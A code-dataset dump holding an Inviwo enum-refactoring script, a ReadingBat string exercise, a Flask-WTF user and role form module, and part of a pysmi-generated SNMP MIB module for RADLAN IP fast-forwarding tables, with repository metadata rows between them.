| 34.75 | 136 | 0.700719 | 106 | 695 | 4.273585 | 0.386792 | 0.198676 | 0.309051 | 0.225166 | 0.370861 | 0.353201 | 0.238411 | 0 | 0 | 0 | 0 | 0.01518 | 0.241727 | 695 | 19 | 137 | 36.578947 | 0.844402 | 0 | 0 | 0.153846 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.076923 | false | 0 | 0.153846 | 0 | 0.307692 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
83c6dd68cad3a17adad28fffee8faa8ea84c1e1b | 14,464 | py | Python | tools/refactoring/enumfixes.py | ImagiaViz/inviwo | a00bb6b0551bc1cf26dc0366c827c1a557a9603d | [
"BSD-2-Clause"
] | 349 | 2015-01-30T09:21:52.000Z | 2022-03-25T03:10:02.000Z | tools/refactoring/enumfixes.py | liu3xing3long/inviwo | 69cca9b6ecd58037bda0ed9e6f53d02f189f19a7 | [
"BSD-2-Clause"
] | 641 | 2015-09-23T08:54:06.000Z | 2022-03-23T09:50:55.000Z | tools/refactoring/enumfixes.py | liu3xing3long/inviwo | 69cca9b6ecd58037bda0ed9e6f53d02f189f19a7 | [
"BSD-2-Clause"
] | 124 | 2015-02-27T23:45:02.000Z | 2022-02-21T09:37:14.000Z | import sys
import os
import re
import colorama
colorama.init()
import refactoring # Note: refactoring.py need to be in the current working directory
paths = [
"/Users/petst/Work/Projects/Inviwo-Developent/Private/Inviwo-dev",
"/Users/petst/Work/Projects/Inviwo-Developent/Private/Inviwo-research"
]
#paths = [
# "C:/Users/petst55/Work/Inviwo/Inviwo-dev",
# "C:/Users/petst55/Work/Inviwo/Inviwo-research"
#]
excludespatterns = ["*/ext/*", "*moc_*", "*cmake*", "*/proteindocking/*", "*/proteindocking2/*", "*/genetree/*", "*/vrnbase/*"];
files = refactoring.find_files(paths, ['*.h', '*.cpp'], excludes=excludespatterns)
def replace(pattern, replacement) :
print("Matches:")
matches = refactoring.find_matches(files, pattern)
print("\n")
print("Replacing:")
refactoring.replace_matches(matches, pattern, replacement)
numericTypeReplacements = {
"DataFormatEnums::NumericType" : "NumericType",
"DataFormatEnums::NOT_SPECIALIZED_TYPE" : "NumericType::NotSpecialized",
"DataFormatEnums::FLOAT_TYPE" : "NumericType::Float",
"DataFormatEnums::UNSIGNED_INTEGER_TYPE" : "NumericType::UnsignedInteger",
"DataFormatEnums::SIGNED_INTEGER_TYPE" : "NumericType::SignedInteger"
};
dataFormatIdReplacements = {
"DataFormatEnums::Id" : "DataFormatId",
"DataFormatEnums::NOT_SPECIALIZED" : "DataFormatId::NotSpecialized",
"DataFormatEnums::FLOAT16" : "DataFormatId::Float16",
"DataFormatEnums::FLOAT32" : "DataFormatId::Float32",
"DataFormatEnums::FLOAT64" : "DataFormatId::Float64",
"DataFormatEnums::INT8" : "DataFormatId::Int8",
"DataFormatEnums::INT16" : "DataFormatId::Int16",
"DataFormatEnums::INT32" : "DataFormatId::Int32",
"DataFormatEnums::INT64" : "DataFormatId::Int64",
"DataFormatEnums::UINT8" : "DataFormatId::UInt8",
"DataFormatEnums::UINT16" : "DataFormatId::UInt16",
"DataFormatEnums::UINT32" : "DataFormatId::UInt32",
"DataFormatEnums::UINT64" : "DataFormatId::UInt64",
"DataFormatEnums::Vec2FLOAT16" : "DataFormatId::Vec2Float16",
"DataFormatEnums::Vec2FLOAT32" : "DataFormatId::Vec2Float32",
"DataFormatEnums::Vec2FLOAT64" : "DataFormatId::Vec2Float64",
"DataFormatEnums::Vec2INT8" : "DataFormatId::Vec2Int8",
"DataFormatEnums::Vec2INT16" : "DataFormatId::Vec2Int16",
"DataFormatEnums::Vec2INT32" : "DataFormatId::Vec2Int32",
"DataFormatEnums::Vec2INT64" : "DataFormatId::Vec2Int64",
"DataFormatEnums::Vec2UINT8" : "DataFormatId::Vec2UInt8",
"DataFormatEnums::Vec2UINT16" : "DataFormatId::Vec2UInt16",
"DataFormatEnums::Vec2UINT32" : "DataFormatId::Vec2UInt32",
"DataFormatEnums::Vec2UINT64" : "DataFormatId::Vec2UInt64",
"DataFormatEnums::Vec3FLOAT16" : "DataFormatId::Vec3Float16",
"DataFormatEnums::Vec3FLOAT32" : "DataFormatId::Vec3Float32",
"DataFormatEnums::Vec3FLOAT64" : "DataFormatId::Vec3Float64",
"DataFormatEnums::Vec3INT8" : "DataFormatId::Vec3Int8",
"DataFormatEnums::Vec3INT16" : "DataFormatId::Vec3Int16",
"DataFormatEnums::Vec3INT32" : "DataFormatId::Vec3Int32",
"DataFormatEnums::Vec3INT64" : "DataFormatId::Vec3Int64",
"DataFormatEnums::Vec3UINT8" : "DataFormatId::Vec3UInt8",
"DataFormatEnums::Vec3UINT16" : "DataFormatId::Vec3UInt16",
"DataFormatEnums::Vec3UINT32" : "DataFormatId::Vec3UInt32",
"DataFormatEnums::Vec3UINT64" : "DataFormatId::Vec3UInt64",
"DataFormatEnums::Vec4FLOAT16" : "DataFormatId::Vec4Float16",
"DataFormatEnums::Vec4FLOAT32" : "DataFormatId::Vec4Float32",
"DataFormatEnums::Vec4FLOAT64" : "DataFormatId::Vec4Float64",
"DataFormatEnums::Vec4INT8" : "DataFormatId::Vec4Int8",
"DataFormatEnums::Vec4INT16" : "DataFormatId::Vec4Int16",
"DataFormatEnums::Vec4INT32" : "DataFormatId::Vec4Int32",
"DataFormatEnums::Vec4INT64" : "DataFormatId::Vec4Int64",
"DataFormatEnums::Vec4UINT8" : "DataFormatId::Vec4UInt8",
"DataFormatEnums::Vec4UINT16" : "DataFormatId::Vec4UInt16",
"DataFormatEnums::Vec4UINT32" : "DataFormatId::Vec4UInt32",
"DataFormatEnums::Vec4UINT64" : "DataFormatId::Vec4UInt64",
"DataFormatEnums::NUMBER_OF_FORMATS" : "DataFormatId::NumberOfFormats"
}
dataFormatTypeReplacements = {
"DataFLOAT16" : "DataFloat16",
"DataFLOAT32" : "DataFloat32",
"DataFLOAT64" : "DataFloat64",
"DataINT8" : "DataInt8",
"DataINT16" : "DataInt16",
"DataINT32" : "DataInt32",
"DataINT64" : "DataInt64",
"DataUINT8" : "DataUInt8",
"DataUINT16" : "DataUInt16",
"DataUINT32" : "DataUInt32",
"DataUINT64" : "DataUInt64",
"DataVec2FLOAT16" : "DataVec2Float16",
"DataVec2FLOAT32" : "DataVec2Float32",
"DataVec2FLOAT64" : "DataVec2Float64",
"DataVec2INT8" : "DataVec2Int8",
"DataVec2INT16" : "DataVec2Int16",
"DataVec2INT32" : "DataVec2Int32",
"DataVec2INT64" : "DataVec2Int64",
"DataVec2UINT8" : "DataVec2UInt8",
"DataVec2UINT16" : "DataVec2UInt16",
"DataVec2UINT32" : "DataVec2UInt32",
"DataVec2UINT64" : "DataVec2UInt64",
"DataVec3FLOAT16" : "DataVec3Float16",
"DataVec3FLOAT32" : "DataVec3Float32",
"DataVec3FLOAT64" : "DataVec3Float64",
"DataVec3INT8" : "DataVec3Int8",
"DataVec3INT16" : "DataVec3Int16",
"DataVec3INT32" : "DataVec3Int32",
"DataVec3INT64" : "DataVec3Int64",
"DataVec3UINT8" : "DataVec3UInt8",
"DataVec3UINT16" : "DataVec3UInt16",
"DataVec3UINT32" : "DataVec3UInt32",
"DataVec3UINT64" : "DataVec3UInt64",
"DataVec4FLOAT16" : "DataVec4Float16",
"DataVec4FLOAT32" : "DataVec4Float32",
"DataVec4FLOAT64" : "DataVec4Float64",
"DataVec4INT8" : "DataVec4Int8",
"DataVec4INT16" : "DataVec4Int16",
"DataVec4INT32" : "DataVec4Int32",
"DataVec4INT64" : "DataVec4Int64",
"DataVec4UINT8" : "DataVec4UInt8",
"DataVec4UINT16" : "DataVec4UInt16",
"DataVec4UINT32" : "DataVec4UInt32",
"DataVec4UINT64" : "DataVec4UInt64",
}
ShadingFunctionReplacements = {
"ShadingFunctionEnum::Enum" : "ShadingFunctionKind",
"ShadingFunctionEnum::HENYEY_GREENSTEIN" : "ShadingFunctionKind::HenyeyGreenstein",
"ShadingFunctionEnum::SCHLICK" : "ShadingFunctionKind::Schlick",
"ShadingFunctionEnum::BLINN_PHONG" : "ShadingFunctionKind::BlinnPhong",
"ShadingFunctionEnum::WARD" : "ShadingFunctionKind::Ward",
"ShadingFunctionEnum::COOK_TORRANCE" : "ShadingFunctionKind::CookTorrance",
"ShadingFunctionEnum::ABC_MICROFACET" : "ShadingFunctionKind::AbcMicrofacet",
"ShadingFunctionEnum::ASHIKHMIN" : "ShadingFunctionKind::Ashikhmin",
"ShadingFunctionEnum::MIX" : "ShadingFunctionKind::Mix",
"ShadingFunctionEnum::ISOTROPIC" : "ShadingFunctionKind::Isotropic"
}
usageModeReplacements = {
"APPLICATION" : "UsageMode::Application",
"DEVELOPMENT" : "UsageMode::Development"
}
drawModeReplacements = {
"DrawMode::NOT_SPECIFIED" : "DrawMode::NotSpecified",
"DrawMode::POINTS" : "DrawMode::Points",
"DrawMode::LINES" : "DrawMode::Lines",
"DrawMode::LINE_STRIP" : "DrawMode::LineStrip",
"DrawMode::LINE_LOOP" : "DrawMode::LineLoop",
"DrawMode::LINES_ADJACENCY" : "DrawMode::LinesAdjacency",
"DrawMode::LINE_STRIP_ADJACENCY" : "DrawMode::LineStripAdjacency",
"DrawMode::TRIANGLES" : "DrawMode::Triangles",
"DrawMode::TRIANGLE_STRIP" : "DrawMode::TriangleStrip",
"DrawMode::TRIANGLE_FAN" : "DrawMode::TriangleFan",
"DrawMode::TRIANGLES_ADJACENCY" : "DrawMode::TrianglesAdjacency",
"DrawMode::TRIANGLE_STRIP_ADJACENCY" : "DrawMode::TriangleStripAdjacency",
"DrawMode::NUMBER_OF_DRAW_MODES" : "DrawMode::NumberOfDrawModes"
}
interactionEventTypeReplacements = {
"NONE_SUPPORTED" : "InteractionEventType::NoneSupported",
"MOUSE_INTERACTION_EVENT" : "InteractionEventType::MouseInteraction",
"TOUCH_INTERACTION_EVENT" : "InteractionEventType::TouchInteraction"
}
glVendorReplacements = {
"VENDOR_NVIDIA" : "GlVendor::Nvidia",
"VENDOR_AMD" : "GlVendor::Amd",
"VENDOR_INTEL" : "GlVendor::Intel",
"VENDOR_UNKNOWN" : "GlVendor::Unknown"
}
gLFormatsNormalizationReplacements = {
"GLFormats::NONE": "GLFormats::Normalization::None",
"GLFormats::NORMALIZED": "GLFormats::Normalization::Normalized",
"GLFormats::SIGN_NORMALIZED": "GLFormats::Normalization::SignNormalized"
}
cLFormatsNormalizationReplacements = {
"CLFormats::NONE": "CLFormats::Normalization::None",
"CLFormats::NORMALIZED": "CLFormats::Normalization::Normalized",
"CLFormats::SIGN_NORMALIZED": "CLFormats::Normalization::SignNormalized"
}
invalidationLevelReplacements = {
"VALID" : "InvalidationLevel::Valid",
"INVALID_OUTPUT" : "InvalidationLevel::InvalidOutput",
"INVALID_RESOURCES" : "InvalidationLevel::InvalidResources"
}
pathTypeReplacements = {
"InviwoApplication::PathType" : "PathType",
"InviwoApplication::PATH_DATA" : "PathType::Data",
"InviwoApplication::PATH_VOLUMES" : "PathType::Volumes",
"InviwoApplication::PATH_MODULES" : "PathType::Modules",
"InviwoApplication::PATH_WORKSPACES" : "PathType::Workspaces",
"InviwoApplication::PATH_SCRIPTS" : "PathType::Scripts",
"InviwoApplication::PATH_PORTINSPECTORS" : "PathType::PortInspectors",
"InviwoApplication::PATH_IMAGES" : "PathType::Images",
"InviwoApplication::PATH_DATABASES" : "PathType::Databases",
"InviwoApplication::PATH_RESOURCES" : "PathType::Resources",
"InviwoApplication::PATH_TRANSFERFUNCTIONS" : "PathType::TransferFunctions",
"InviwoApplication::PATH_SETTINGS" : "PathType::Settings",
"InviwoApplication::PATH_HELP" : "PathType::Help"
}
geometryTypeReplacements = {
"BufferType::POSITION_ATTRIB" : "BufferType::PositionAttrib",
"BufferType::NORMAL_ATTRIB" : "BufferType::NormalAttrib",
"BufferType::COLOR_ATTRIB" : "BufferType::ColorAttrib",
"BufferType::TEXCOORD_ATTRIB" : "BufferType::TexcoordAttrib",
"BufferType::CURVATURE_ATTRIB" : "BufferType::CurvatureAttrib",
"BufferType::INDEX_ATTRIB" : "BufferType::IndexAttrib",
"BufferType::NUMBER_OF_BUFFER_TYPES" : "BufferType::NumberOfBufferTypes",
"BufferUsage::STATIC" : "BufferUsage::Static",
"BufferUsage::DYNAMIC" : "BufferUsage::Dynamic",
"DrawType::NOT_SPECIFIED" : "DrawType::NotSpecified",
"DrawType::POINTS" : "DrawType::Points",
"DrawType::LINES" : "DrawType::Lines",
"DrawType::TRIANGLES" : "DrawType::Triangles",
"DrawType::NUMBER_OF_DRAW_TYPES" : "DrawType::NumberOfDrawTypes",
"ConnectivityType::NONE" : "ConnectivityType::None",
"ConnectivityType::STRIP" : "ConnectivityType::Strip",
"ConnectivityType::LOOP" : "ConnectivityType::Loop",
"ConnectivityType::FAN" : "ConnectivityType::Fan",
"ConnectivityType::ADJACENCY" : "ConnectivityType::Adjacency",
"ConnectivityType::STRIP_ADJACENCY" : "ConnectivityType::StripAdjacency",
"ConnectivityType::NUMBER_OF_CONNECTIVITY_TYPES" : "ConnectivityType::NumberOfConnectivityTypes",
}
propertySerializationModeReplacements = {
"PropertySerializationMode::DEFAULT" : "PropertySerializationMode::Default",
"PropertySerializationMode::ALL" : "PropertySerializationMode::All",
"PropertySerializationMode::NONE" : "PropertySerializationMode::None"
}
eventReplacements = {
"MouseEvent::MOUSE_BUTTON_NONE" : "MouseButton::None",
"MouseEvent::MOUSE_BUTTON_LEFT" : "MouseButton::Left",
"MouseEvent::MOUSE_BUTTON_MIDDLE" : "MouseButton::Middle",
"MouseEvent::MOUSE_BUTTON_RIGHT" : "MouseButton::Right",
"MouseEvent::MOUSE_STATE_NONE" : "MouseState::None",
"MouseEvent::MOUSE_STATE_MOVE" : "MouseState::Move",
"MouseEvent::MOUSE_STATE_PRESS" : "MouseState::Press",
"MouseEvent::MOUSE_STATE_RELEASE" : "MouseState::Release",
"MouseEvent::MOUSE_STATE_DOUBLE_CLICK" : "MouseState::DoubleClick",
"KeyboardEvent::KEY_STATE_PRESS" : "KeyState::Press",
"KeyboardEvent::KEY_STATE_RELEASE" : "KeyState::Release",
"TouchPoint::TOUCH_STATE_NONE" : "TouchState::None",
"TouchPoint::TOUCH_STATE_STARTED" : "TouchState::Started",
"TouchPoint::TOUCH_STATE_UPDATED" : "TouchState::Updated",
"TouchPoint::TOUCH_STATE_STATIONARY" : "TouchState::Stationary",
"TouchPoint::TOUCH_STATE_ENDED" : "TouchState::Finished",
"GestureEvent::PAN" : "GestureType::Pan",
"GestureEvent::PINCH" : "GestureType::Pinch",
"GestureEvent::SWIPE" : "GestureType::Swipe",
"GestureEvent::GESTURE_STATE_NONE" : "GestureState::None",
"GestureEvent::GESTURE_STATE_STARTED" : "GestureState::Started",
"GestureEvent::GESTURE_STATE_UPDATED" : "GestureState::Updated",
"GestureEvent::GESTURE_STATE_ENDED" : "GestureState::Finished",
"GestureEvent::GESTURE_STATE_CANCELED" : "GestureState::Canceled",
"InteractionEvent::MODIFIER_NONE" : "KeyModifier::None",
"InteractionEvent::MODIFIER_ALT" : "KeyModifier::Alt",
"InteractionEvent::MODIFIER_CTRL" : "KeyModifier::Control",
"InteractionEvent::MODIFIER_SHIFT" : "KeyModifier::Shift"
}
print("Looking in " + str(len(files)) + " files")
# order matters here...
# for k,v in numericTypeReplacements.items():
# replace(k,v)
# for k,v in dataFormatIdReplacements.items():
# replace(k,v)
# for k,v in dataFormatTypeReplacements.items():
# replace(k,v)
# for k,v in ShadingFunctionReplacements.items():
# replace(k,v)
# for k,v in usageModeReplacements.items():
# replace(r"\b"+k+r"\b", v)
# for k,v in drawModeReplacements.items():
# replace(r"\b"+k+r"\b", v)
# for k,v in interactionEventTypeReplacements.items():
# replace(r"\b"+k+r"\b", v)
# for k,v in glVendorReplacements.items():
# replace(r"\b"+k+r"\b", v)
# for k,v in gLFormatsNormalizationReplacements.items():
# replace(r"\b"+k+r"\b", v)
# for k,v in cLFormatsNormalizationReplacements.items():
# replace(r"\b"+k+r"\b", v)
# for k,v in invalidationLevelReplacements.items():
# replace(r"\b"+k+r"\b", v)
#for k,v in pathTypeReplacements.items():
# replace(r"\b"+k+r"\b", v)
#for k,v in geometryTypeReplacements.items():
# replace(r"\b"+k+r"\b", v)
#for k,v in propertySerializationModeReplacements.items():
# replace(r"\b"+k+r"\b", v)
for k,v in eventReplacements.items():
replace(r"\b"+k+r"\b", v)
| 41.803468 | 128 | 0.69628 | 1,127 | 14,464 | 8.828749 | 0.301686 | 0.004422 | 0.007538 | 0.010553 | 0.051457 | 0.051457 | 0.045628 | 0.045628 | 0.025126 | 0.025126 | 0 | 0.037055 | 0.147331 | 14,464 | 345 | 129 | 41.924638 | 0.769724 | 0.08096 | 0 | 0 | 0 | 0 | 0.691437 | 0.490155 | 0 | 0 | 0 | 0 | 0 | 1 | 0.003953 | false | 0 | 0.019763 | 0 | 0.023715 | 0.01581 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
83d086cbd02d179d44c2730f1cb8af9ee1a592f2 | 516 | py | Python | python/string_ops/combine2.py | readingbat/readingbat-python-content | 437648be8e15ce3ce21d5f256f91d71658bbb889 | [
"Apache-2.0"
] | null | null | null | python/string_ops/combine2.py | readingbat/readingbat-python-content | 437648be8e15ce3ce21d5f256f91d71658bbb889 | [
"Apache-2.0"
] | null | null | null | python/string_ops/combine2.py | readingbat/readingbat-python-content | 437648be8e15ce3ce21d5f256f91d71658bbb889 | [
"Apache-2.0"
] | null | null | null | # @desc The 2nd character in a string is at index 1.
def combine2(s1, s2):
s3 = s1[1]
s4 = s2[1]
result = s3 + s4
return result
def main():
print(combine2('Car', 'wash'))
print(combine2(' Hello', ' world'))
print(combine2('55', '88'))
print(combine2('Snow', 'ball'))
print(combine2('Rain', 'boots'))
print(combine2('Reading', 'bat'))
print(combine2('AA', 'HI'))
print(combine2('Hi', 'there'))
print(combine2(' ', ' '))
if __name__ == '__main__':
main()
| 21.5 | 52 | 0.562016 | 66 | 516 | 4.272727 | 0.575758 | 0.414894 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.065657 | 0.232558 | 516 | 23 | 53 | 22.434783 | 0.646465 | 0.096899 | 0 | 0 | 0 | 0 | 0.157328 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.117647 | false | 0 | 0 | 0 | 0.176471 | 0.529412 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 2 |
83d67a32fe01f386b30f8971a0b03a885e1b0fa5 | 1,086 | py | Python | pertemuan_9/4_Final_App/app/forms/user.py | Muhammad-Yunus/Flask-Web-Development | c13e3fda30151b1155242abe4532d5f4d7bc120e | [
"Apache-2.0"
] | null | null | null | pertemuan_9/4_Final_App/app/forms/user.py | Muhammad-Yunus/Flask-Web-Development | c13e3fda30151b1155242abe4532d5f4d7bc120e | [
"Apache-2.0"
] | null | null | null | pertemuan_9/4_Final_App/app/forms/user.py | Muhammad-Yunus/Flask-Web-Development | c13e3fda30151b1155242abe4532d5f4d7bc120e | [
"Apache-2.0"
] | null | null | null | from . import datetime
from . import FlaskForm
from . import BooleanField, StringField, TextAreaField, \
IntegerField, SelectMultipleField, PasswordField, \
validators, SubmitField, DateTimeField
class UserForm(FlaskForm):
id = IntegerField(default=0)
name = StringField('Name', [validators.Length(min=4, max=255), validators.DataRequired()])
email = StringField('Email Address', [validators.Length(min=6, max=255), validators.DataRequired()])
phone = StringField('Phone Number', [validators.Length(min=8, max=14)])
role = SelectMultipleField('Role', coerce=int, default = [1])
active = BooleanField('Is Active ?')
confirmed_at = DateTimeField('Confirmed at', format="%Y-%m-%d %H:%M:%S", default=datetime.today)
submit = SubmitField('Submit')
class RoleForm(FlaskForm):
id = IntegerField(default=0)
name = StringField('Name', [validators.Length(min=4, max=80), validators.DataRequired()])
description = TextAreaField('Description', default='', render_kw={'rows':5})
submit = SubmitField('Submit') | 51.714286 | 104 | 0.690608 | 115 | 1,086 | 6.504348 | 0.478261 | 0.085562 | 0.101604 | 0.080214 | 0.195187 | 0.195187 | 0.195187 | 0.195187 | 0.195187 | 0.195187 | 0 | 0.01978 | 0.162063 | 1,086 | 21 | 105 | 51.714286 | 0.802198 | 0 | 0 | 0.210526 | 0 | 0 | 0.095676 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.052632 | 0.157895 | 0 | 0.894737 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 2 |
83dd1716c85d109cb01002b2448b112dac6847fb | 42,596 | py | Python | pysnmp/RADLAN-rlFft.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 11 | 2021-02-02T16:27:16.000Z | 2021-08-31T06:22:49.000Z | pysnmp/RADLAN-rlFft.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 75 | 2021-02-24T17:30:31.000Z | 2021-12-08T00:01:18.000Z | pysnmp/RADLAN-rlFft.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 10 | 2019-04-30T05:51:36.000Z | 2022-02-16T03:33:41.000Z | #
# PySNMP MIB module RADLAN-rlFft (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/RADLAN-rlFft
# Produced by pysmi-0.3.4 at Mon Apr 29 20:42:31 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
Integer, OctetString, ObjectIdentifier = mibBuilder.importSymbols("ASN1", "Integer", "OctetString", "ObjectIdentifier")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ValueSizeConstraint, SingleValueConstraint, ValueRangeConstraint, ConstraintsIntersection, ConstraintsUnion = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueSizeConstraint", "SingleValueConstraint", "ValueRangeConstraint", "ConstraintsIntersection", "ConstraintsUnion")
rnd, = mibBuilder.importSymbols("RADLAN-MIB", "rnd")
NotificationGroup, ModuleCompliance = mibBuilder.importSymbols("SNMPv2-CONF", "NotificationGroup", "ModuleCompliance")
iso, MibScalar, MibTable, MibTableRow, MibTableColumn, MibIdentifier, Counter32, TimeTicks, NotificationType, Bits, ObjectIdentity, Integer32, ModuleIdentity, Gauge32, Counter64, Unsigned32, IpAddress = mibBuilder.importSymbols("SNMPv2-SMI", "iso", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "MibIdentifier", "Counter32", "TimeTicks", "NotificationType", "Bits", "ObjectIdentity", "Integer32", "ModuleIdentity", "Gauge32", "Counter64", "Unsigned32", "IpAddress")
TextualConvention, TruthValue, RowStatus, PhysAddress, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "TextualConvention", "TruthValue", "RowStatus", "PhysAddress", "DisplayString")
class Percents(TextualConvention, Integer32):
status = 'current'
subtypeSpec = Integer32.subtypeSpec + ValueRangeConstraint(0, 100)
class NetNumber(TextualConvention, OctetString):
status = 'current'
subtypeSpec = OctetString.subtypeSpec + ValueSizeConstraint(4, 4)
fixedLength = 4
rlFFT = ModuleIdentity((1, 3, 6, 1, 4, 1, 89, 47))
rlFFT.setRevisions(('2004-06-01 00:00',))
if mibBuilder.loadTexts: rlFFT.setLastUpdated('200406010000Z')
if mibBuilder.loadTexts: rlFFT.setOrganization('')
rlIpFFT = MibIdentifier((1, 3, 6, 1, 4, 1, 89, 47, 1))
rlIpFftMibVersion = MibScalar((1, 3, 6, 1, 4, 1, 89, 47, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftMibVersion.setStatus('current')
rlIpMaxFftNumber = MibScalar((1, 3, 6, 1, 4, 1, 89, 47, 1, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpMaxFftNumber.setStatus('current')
rlIpFftDynamicSupported = MibScalar((1, 3, 6, 1, 4, 1, 89, 47, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("supported", 1), ("unsupported", 2)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftDynamicSupported.setStatus('current')
rlIpFftSubnetSupported = MibScalar((1, 3, 6, 1, 4, 1, 89, 47, 1, 4), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("supported", 1), ("unsupported", 2)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftSubnetSupported.setStatus('current')
rlIpFftUnknownAddrMsgUsed = MibScalar((1, 3, 6, 1, 4, 1, 89, 47, 1, 5), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("used", 1), ("unused", 2)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftUnknownAddrMsgUsed.setStatus('current')
rlIpFftAgingTimeSupported = MibScalar((1, 3, 6, 1, 4, 1, 89, 47, 1, 6), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("supported", 1), ("unsupported", 2)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftAgingTimeSupported.setStatus('current')
rlIpFftSrcAddrSupported = MibScalar((1, 3, 6, 1, 4, 1, 89, 47, 1, 7), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("supported", 1), ("unsupported", 2)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftSrcAddrSupported.setStatus('current')
rlIpFftAgingTimeout = MibScalar((1, 3, 6, 1, 4, 1, 89, 47, 1, 8), Integer32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: rlIpFftAgingTimeout.setStatus('current')
rlIpFftRedBoundary = MibScalar((1, 3, 6, 1, 4, 1, 89, 47, 1, 9), Percents()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: rlIpFftRedBoundary.setStatus('current')
rlIpFftYellowBoundary = MibScalar((1, 3, 6, 1, 4, 1, 89, 47, 1, 10), Percents()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: rlIpFftYellowBoundary.setStatus('current')
rlIpFftNumTable = MibTable((1, 3, 6, 1, 4, 1, 89, 47, 1, 12), )
if mibBuilder.loadTexts: rlIpFftNumTable.setStatus('current')
rlIpFftNumEntry = MibTableRow((1, 3, 6, 1, 4, 1, 89, 47, 1, 12, 1), ).setIndexNames((0, "RADLAN-rlFft", "rlIpFftNumIndex"))
if mibBuilder.loadTexts: rlIpFftNumEntry.setStatus('current')
rlIpFftNumIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 12, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftNumIndex.setStatus('current')
rlIpFftNumStnRoutesNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 12, 1, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftNumStnRoutesNumber.setStatus('current')
rlIpFftNumSubRoutesNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 12, 1, 3), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftNumSubRoutesNumber.setStatus('current')
rlIpFftStnTable = MibTable((1, 3, 6, 1, 4, 1, 89, 47, 1, 13), )
if mibBuilder.loadTexts: rlIpFftStnTable.setStatus('current')
rlIpFftStnEntry = MibTableRow((1, 3, 6, 1, 4, 1, 89, 47, 1, 13, 1), ).setIndexNames((0, "RADLAN-rlFft", "rlIpFftStnIndex"), (0, "RADLAN-rlFft", "rlIpFftStnMrid"), (0, "RADLAN-rlFft", "rlIpFftStnDstIpAddress"))
if mibBuilder.loadTexts: rlIpFftStnEntry.setStatus('current')
rlIpFftStnIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 13, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftStnIndex.setStatus('current')
rlIpFftStnMrid = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 13, 1, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftStnMrid.setStatus('current')
rlIpFftStnDstIpAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 13, 1, 3), IpAddress()).setMaxAccess("readonly")
